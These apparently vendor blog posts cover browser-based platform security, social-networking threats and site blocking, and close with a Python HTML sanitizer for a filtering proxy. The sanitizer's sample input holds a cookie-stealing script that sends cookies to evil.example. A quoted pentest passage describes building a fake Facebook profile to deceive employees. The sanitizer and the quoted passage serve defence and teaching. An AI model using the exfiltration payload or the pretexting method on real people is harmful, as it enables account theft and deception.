More on the browser OS – from Microsoft Research

After arguing that your next operating system is not going to be Windows, Mac or Linux (hint: you are reading this post on it; more details in our annual report and predictions paper), I came across this research from Microsoft (direct link to the PDF here) on how to construct a secure browser OS, given that web browsing has moved substantially from viewing static web pages to running what amounts to an OS inside the browser.

The Microsoft researchers model a secure browser as a multi-principal operating system, and along the way cover a lot of security fundamentals that modern browsers either lack or implement poorly. Highly recommended reading, and definitely worth following up on.

If Gears was a problem then how about running Gmail offline on Air?

So, yesterday I wrote about the newly reported (and widely expected) vulnerabilities in Google’s Gears technology. The issue is clear: Gears is picking up speed and traction as Google’s applications (Gmail, Docs, etc.) start to use it, and its security model is being scrutinized. And then I stumbled across GeeMail. It’s basically offline Gmail without using Google’s technology. How do you do that? Simple: use Adobe’s Air™. As if one technology was not enough to deal with, try mixing and matching two for some added confusion and overlap between security models.

Just like Gears, Air has its benefits (admittedly, I use them both), but seriously, this is just too much! So what’s the next step? Gmail offline using Adobe Air with a Silverlight UI running through a Yahoo! Pipes backend? Back in the day we used to follow a simple methodology: keep it simple (I’m omitting the latter part). Doing things just for the sake of using a specific technology is so ’90s “war of the programming languages”; everyone has since moved on to the simple model of using the right tool for the right job. In our case, even the review shows that the technology mix didn’t really cut it.

The oracle strikes again – “Browser OS” threats start to appear

Moving on from the social networking issues we outlined over the past couple of weeks: having followed the predictions and their materialization (here, here, here in the announcement of Gmail offline, here, and here), we can already see the “Browser OS”, as we dubbed it in our annual threat and predictions report, begin to materialize as well.

As per a recent Register article, threats related to Google Gears™ have started to appear, taking advantage of the extended capabilities granted to the browser, just as we predicted in our report. We named Google’s Gears, Adobe’s Air and Microsoft’s Silverlight as the prominent technologies that would enable the “Browser OS” and would be scrutinized for their security implications.

As always, we are not here to say “nay” to every new technology; quite the opposite: these technologies are the future, and they enable businesses and individuals alike to be more productive and have a better web experience. Our only claim is that anyone purporting to provide internet and web security needs to take these technologies into account, and needs enough forward-looking vision to execute on that.

Social networking threats – the “hacker” story

As the social networking threats angle has been picking up a lot of traction lately <pat_on_own_back>, the folks at Netragard have posted a great write-up on using social networks as an attack tool, involving both social engineering and technical exploits. The post can be found here, and I just want to quote a couple of sections that I feel very strongly about:

“The social reconnaissance enabled us to identify 1402 employees, 906 of whom used Facebook. We didn’t read all 906 profiles but we did read around 200 which gave us sufficient information to create a fake employee profile” … “After the payload was created and tested we started the process of building an easy to trust Facebook profile. Because most of the targeted employees were male between the ages of 20 and 40 we decided that it would be best to become a very attractive 28 year old female. We found a fitting photograph by searching Google Images and used that photograph for our fake Facebook profile. We also populated the profile with information about our experiences at work by using combined stories that we collected from real employee Facebook profiles.”

Needless to say, the newly created fake profile, which could just as well have been a hijacked real one, went a long way toward enabling the attackers (who were commissioned to perform a penetration test this time) to gain access to internal company resources quite easily.

Blocking Facebook? Not popular, and not effective

OK, so we know that social networking sites have their issues and threats associated with them; we’ll be the first to admit it. But by the same token, we also know that simply blocking (or censoring, pick the more politically correct term) them doesn’t work either. This comes in light of the Maryland General Assembly’s decision to block Facebook and MySpace from its computers.

It’s a lose-lose situation. You lose the added business value of social networking, you lose the “popular” vote when your employees expect access to such sites, and you lose on the security front, since a blocklist of named sites is easily circumvented.

The solution as we see it is to allow access to social networking sites while stripping out any malicious content that may end up there, and to control which functionality is permitted while browsing them.
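As an added illustration of the “strip the malicious content, keep the site usable” approach (example code written for this page, not the product or method the post describes), here is an allowlist-based HTML sanitizer in Python that a filtering proxy could apply to profile or wall content before it reaches the browser. It keeps a small set of formatting tags, drops every `on*` event handler, drops `href`/`src` values whose scheme is not http(s) or mailto, removes `<script>`/`<style>` elements together with their bodies, and closes any tags the input left open. The tag and attribute allowlists, the URL policy and the sample post are all constructed for the example.

```python
"""Allowlist HTML sanitizer: keep formatting, strip active content.

Added example; the allowlists and URL policy below are hypothetical
choices for illustration, not a vetted production policy.
"""
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "ul", "ol", "li", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
# Hypothetical URL policy: only these schemes may appear in href/src.
SAFE_URL = re.compile(r"^(https?:|mailto:)", re.IGNORECASE)


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized output fragments
        self.stack = []      # open allowed tags, so output stays balanced
        self.skip_depth = 0  # >0 while inside <script>/<style>: drop text too
        self.dropped = []    # audit log of removed tags/attributes

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            self.dropped.append(f"<{tag}>")
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")  # tag removed, its text is kept
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            # Every on* handler is script; anything outside the allowlist goes.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
                continue
            if name in ("href", "src"):
                v = (value or "").strip()
                if not SAFE_URL.match(v):  # blocks javascript:, data:, vbscript:
                    self.dropped.append(f"{tag}@{name}={v[:30]}")
                    continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        # <br/> or <img .../>; close non-void tags written in self-closing form
        self.handle_starttag(tag, attrs)
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if tag in self.stack:
            # Close everything opened after this tag so nesting stays valid.
            while True:
                t = self.stack.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(escape(data, quote=False))

    def close(self):
        super().close()
        while self.stack:  # close tags the input left open
            self.out.append(f"</{self.stack.pop()}>")


def sanitize(html):
    """Return (clean_html, dropped_items) for an untrusted HTML fragment."""
    p = Sanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out), p.dropped


# Constructed sample of a hostile wall post, for demonstration only.
SAMPLE_POST = (
    '<p>Check my <b onmouseover="steal()">photos</b> '
    '<a href="javascript:alert(1)">here</a> or '
    '<a href="https://example.com/album">here</a>!'
    '<script>document.location="http://evil.example/"+document.cookie</script>'
    '<img src="https://example.com/a.jpg" onerror="x()"></p>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_POST)
    print(clean)
    print("dropped:", dropped)
```

The `dropped` list is the part a proxy operator actually wants to keep: logging what was stripped, per user and per site, is how you learn which functionality to permit or deny rather than guessing. Regex-based stripping is deliberately avoided here; a real parser sees the same token boundaries the browser will.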